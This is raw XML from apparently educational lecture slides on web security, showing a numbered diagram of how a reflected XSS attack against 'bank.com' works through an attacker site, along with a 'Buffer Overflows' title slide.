              <a:t> the script back to you in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="992222" lvl="1" indent="-556612" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:defRPr sz="4508"/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Your browser, none the wiser, executes the script in the response within the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr u="sng" dirty="0">
              <a:hlinkClick r:id="rId2"/>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79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4038722842"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:cove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8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78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78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7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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buffer Overflows</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115882482"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4387453" y="84158"/>
            <a:ext cx="15609094" cy="1936069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="788" name="Group 788"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5383429" y="3331412"/>
            <a:ext cx="2561093" cy="5427153"/>
            <a:chOff x="538190" y="-1342260"/>
            <a:chExt cx="2561092" cy="5427152"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="786" name="Shape 786"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="538190" y="-413269"/>
              <a:ext cx="2561093" cy="4498161"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:blipFill rotWithShape="1">
              <a:blip r:embed="rId2"/>
              <a:srcRect/>
              <a:tile tx="0" ty="0" sx="100000" sy="100000" flip="none" algn="tl"/>
            </a:blipFill>
            <a:ln w="12700" cap="flat">
              <a:no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3200">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="787" name="Shape 787"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929419" y="-1342261"/>
              <a:ext cx="177863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r>
                <a:t>Client</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Shape 789"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15156932" y="9550217"/>
            <a:ext cx="3060194" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
          </a:blip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400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
                <a:hlinkClick r:id="rId4"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Shape 790"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15156932" y="1924267"/>
            <a:ext cx="3060194" cy="2678907"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>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71437" tIns="71437" rIns="71437" bIns="71437" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>bad.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="797" name="Group 797"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7903037" y="6610595"/>
            <a:ext cx="7257270" cy="3222708"/>
            <a:chOff x="-83557" y="23507"/>
            <a:chExt cx="7257268" cy="3222706"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="791" name="Shape 791"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-83558" y="415794"/>
              <a:ext cx="7257270" cy="2830421"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="796" name="Group 796"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="21528294">
              <a:off x="1260040" y="61158"/>
              <a:ext cx="3632647" cy="2135880"/>
              <a:chOff x="1099" y="2766"/>
              <a:chExt cx="3632646" cy="2135879"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="792" name="Shape 792"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1304020">
                <a:off x="703581" y="877157"/>
                <a:ext cx="2893696"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lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>Click on link</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="795" name="Group 795"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="1099" y="2766"/>
                <a:ext cx="883741" cy="1059302"/>
                <a:chOff x="1099" y="2766"/>
                <a:chExt cx="883739" cy="1059301"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="793" name="Shape 793"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="111930" y="201377"/>
                  <a:ext cx="662079" cy="662079"/>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794" name="Shape 794"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm rot="1300642">
                  <a:off x="147311" y="79979"/>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3</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="803" name="Group 803"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7912952" y="7514245"/>
            <a:ext cx="7277062" cy="3351497"/>
            <a:chOff x="-181298" y="-44435"/>
            <a:chExt cx="7277060" cy="3351496"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="798" name="Shape 798"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-181299" y="460483"/>
              <a:ext cx="7277062" cy="2846579"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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799" name="Shape 799"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="1290205">
              <a:off x="1240441" y="1037069"/>
              <a:ext cx="3994101"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b="1">
                  <a:solidFill>
                    <a:srgbClr val="06BC00"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Echo user input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="802" name="Group 802"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="578408" y="-44436"/>
              <a:ext cx="883741" cy="1059302"/>
              <a:chOff x="1099" y="2766"/>
              <a:chExt cx="883739" cy="1059301"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="800" name="Shape 800"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="111930" y="201377"/>
                <a:ext cx="662079" cy="662079"/>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801" name="Shape 801"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="1300642">
                <a:off x="147311" y="79979"/>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4</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="808" name="Group 808"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3770040" y="8338638"/>
            <a:ext cx="3938652" cy="4021010"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="3938651" cy="4021008"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="804" name="Shape 804"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="833110"/>
              <a:ext cx="3938652" cy="3190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lgn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:t>Execute the</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>malicious script</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>as though the</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>server meant us</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l">
                <a:defRPr sz="4000"/>
              </a:pPr>
              <a:r>
                <a:rPr i="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>to run it</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="807" name="Group 807"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="42715" y="2976"/>
              <a:ext cx="662078" cy="904876"/>
              <a:chOff x="0" y="2976"/>
              <a:chExt cx="662077" cy="904875"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="805" name="Shape 805"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="0" y="124375"/>
                <a:ext cx="662078" cy="662078"/>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806" name="Shape 806"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="71934" y="2976"/>
                <a:ext cx="518209"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5</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="814" name="Group 814"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7934657" y="3751018"/>
            <a:ext cx="7281831" cy="2493101"/>
            <a:chOff x="-89356" y="33410"/>
            <a:chExt cx="7281829" cy="2493100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="809" name="Shape 809"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-89357" y="275839"/>
              <a:ext cx="7281831" cy="2250673"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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810" name="Shape 810"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="1171710" y="667331"/>
              <a:ext cx="4503548"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solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Steal valuable data</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="813" name="Group 813"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="438421" y="1264060"/>
              <a:ext cx="926577" cy="1072129"/>
              <a:chOff x="1297" y="2679"/>
              <a:chExt cx="926576" cy="1072127"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="811" name="Shape 811"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="133546" y="207704"/>
                <a:ext cx="662079" cy="662078"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="254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812" name="Shape 812"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="168927" y="86305"/>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chemeClr val="accent5"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>6</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="820" name="Group 820"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="2299948">
            <a:off x="7161702" y="8678401"/>
            <a:ext cx="8112717" cy="2863922"/>
            <a:chOff x="-920242" y="-80626"/>
            <a:chExt cx="8112716" cy="2863920"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="815" name="Shape 815"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-920243" y="370242"/>
              <a:ext cx="8112717" cy="2413052"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>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816" name="Shape 816"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="773136" y="690387"/>
              <a:ext cx="5453508"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solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Perform attacker action</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="819" name="Group 819"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="525242">
              <a:off x="60063" y="1424211"/>
              <a:ext cx="926577" cy="1072129"/>
              <a:chOff x="1297" y="2679"/>
              <a:chExt cx="926576" cy="1072127"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="817" name="Shape 817"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="133546" y="207704"/>
                <a:ext cx="662079" cy="662078"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>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sp>
            <p:nvSpPr>
              <p:cNvPr id="818" name="Shape 818"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20049694">
                <a:off x="168927" y="86305"/>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chemeClr val="accent5"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>6</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="826" name="Group 826"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7935048" y="2125286"/>
            <a:ext cx="7220501" cy="2220044"/>
            <a:chOff x="154626" y="-52929"/>
            <a:chExt cx="7220499" cy="2220043"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="821" name="Shape 821"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="154626" y="-52930"/>
              <a:ext cx="7220501" cy="2220044"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="822" name="Shape 822"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="1201362" y="592588"/>
              <a:ext cx="3110104"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solidFill>
                    <a:srgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Visit web site</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="825" name="Group 825"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="446565" y="932132"/>
              <a:ext cx="831058" cy="1038663"/>
              <a:chOff x="874" y="2845"/>
              <a:chExt cx="831057" cy="1038662"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="823" name="Shape 823"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="120745" y="69738"/>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1</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="824" name="Shape 824"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="85364" y="191137"/>
                <a:ext cx="662078" cy="662079"/>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grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="832" name="Group 832"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7922460" y="2511381"/>
            <a:ext cx="7256533" cy="2784032"/>
            <a:chOff x="-84301" y="39616"/>
            <a:chExt cx="7256532" cy="2784031"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="827" name="Shape 827"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-84302" y="579933"/>
              <a:ext cx="7256534" cy="2243716"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="101600" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="828" name="Shape 828"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="20593436">
              <a:off x="1043740" y="832405"/>
              <a:ext cx="5604384" cy="752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4000">
                  <a:solidFill>
                    <a:srgbClr val="010000"/>
                  </a:solidFill>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Receive malicious page</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="831" name="Group 831"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="365007" y="1585787"/>
              <a:ext cx="831058" cy="1038664"/>
              <a:chOff x="874" y="2845"/>
              <a:chExt cx="831057" cy="1038662"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="829" name="Shape 829"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="120745" y="69738"/>
                <a:ext cx="591317"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lvl1pPr>
                  <a:defRPr>
                    <a:solidFill>
                      <a:srgbClr val="1333FF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:lvl1pPr>
              </a:lstStyle>
              <a:p>
                <a:r>
                  <a:t>2</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="830" name="Shape 830"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm rot="20574935">
                <a:off x="85364" y="191137"/>
                <a:ext cx="662078" cy="662079"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="25400" cap="flat">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="400000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
                <a:noAutofit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr sz="3200">
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
                <a:endParaRPr/>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="835" name="Group 835"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12238422" y="6024562"/>
            <a:ext cx="7641368" cy="1666876"/>
            <a:chOff x="0" y="5953"/>
            <a:chExt cx="7641366" cy="1666875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="833" name="Shape 833"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1380901" y="5953"/>
              <a:ext cx="6260466" cy="1666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algn="l">
                <a:defRPr>
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>URL specially crafted</a:t>
              </a:r>
              <a:br/>
              <a:r>
                <a:t>by the attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="836" name="Shape 836"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="831451"/>
              <a:ext cx="919128" cy="711282"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="5400000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="10800000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
                <a:cxn ang="16200000">
                  <a:pos x="wd2" y="hd2"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="19053" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="974" y="21600"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="-2547" y="7892"/>
                    <a:pt x="3479" y="692"/>
                    <a:pt x="19053" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="63500" cap="flat">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="400000"/>
              <a:headEnd type="triangle" w="med" len="med"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
